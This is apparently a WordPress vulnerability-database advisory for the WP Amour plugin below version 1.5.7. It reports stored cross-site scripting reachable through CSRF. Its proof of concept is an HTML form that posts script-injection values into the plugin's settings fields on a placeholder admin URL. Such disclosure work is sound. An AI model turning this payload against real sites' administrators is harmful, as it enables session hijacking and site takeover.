WordPress Plugin Vulnerabilities
WP Amour < 1.5.7 - Authenticated Stored Cross-Site Scripting (XSS)
Description
The plugin did not sanitise and escape its setting fields, leading to Stored Cross-Site Scripting issues. Furthermore, the lack of CSRF checks could also allow attackers to trigger the XSS via CSRF attacks against a logged in administrator
Proof of Concept
<html> <body> <form action="https://example.com/wp-admin/admin.php?page=wp-armour" method="POST"> <input type="hidden" name="wpa_field_name" value='"><script>alert(/XSS-Field/)</script>' /> <input type="hidden" name="wpa_error_message" value='"><script>alert(/XSS-Error/)</script>' /> <input type="hidden" name="submit-wpa-general-settings" value="Save General Settings" /> <input type="submit" value="Submit request" /> </form> </body> </html>
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-02-08 (about 3 years ago)
Added
2021-02-08 (about 3 years ago)
Last Updated
2021-02-08 (about 3 years ago)